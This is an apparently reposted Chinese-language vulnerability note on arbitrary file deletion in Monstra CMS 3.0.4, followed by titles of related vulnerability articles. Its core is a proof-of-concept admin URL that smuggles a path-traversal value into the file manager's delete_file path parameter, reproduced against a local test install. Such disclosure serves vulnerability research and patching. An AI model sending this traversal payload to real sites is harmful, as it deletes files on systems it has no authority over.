monstra 3.0.4 任意文件删除

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了monstra 3.0.4 任意文件删除相关的知识,希望对你有一定的参考价值。

monstra 3.0.4 任意文件删除

Vulnerable URL:http://127.0.0.1/monstra-3.0.4/admin/index.php?id=filesmanager&delete_file=1.txt&path=uploads/.......//./.......//./&token=7514f1bfccba396c26a9b80341db814ea505d80a

touch 1.txt in /var/www/html/monstra-3.0.4/

visit url:http://172.16.173.238/monstra-3.0.4/admin/index.php?id=filesmanager&delete_file=1.txt&path=uploads/.......//./.......//./&token=7514f1bfccba396c26a9b80341db814ea505d80a

the 1.txt will delete

技术分享图片

以上是关于monstra 3.0.4 任意文件删除的主要内容,如果未能解决你的问题,请参考以下文章

任意文件删除的一个总结

seacms 任意文件删除

WordPress删除任意文件/执行任意代码安全漏洞临时修复方法

DedeCMS v5.7 注册用户任意文件删除漏洞

monxin cms 任意文件删除漏洞

Discuz!X 3.4 任意文件删除漏洞复现过程(附python脚本)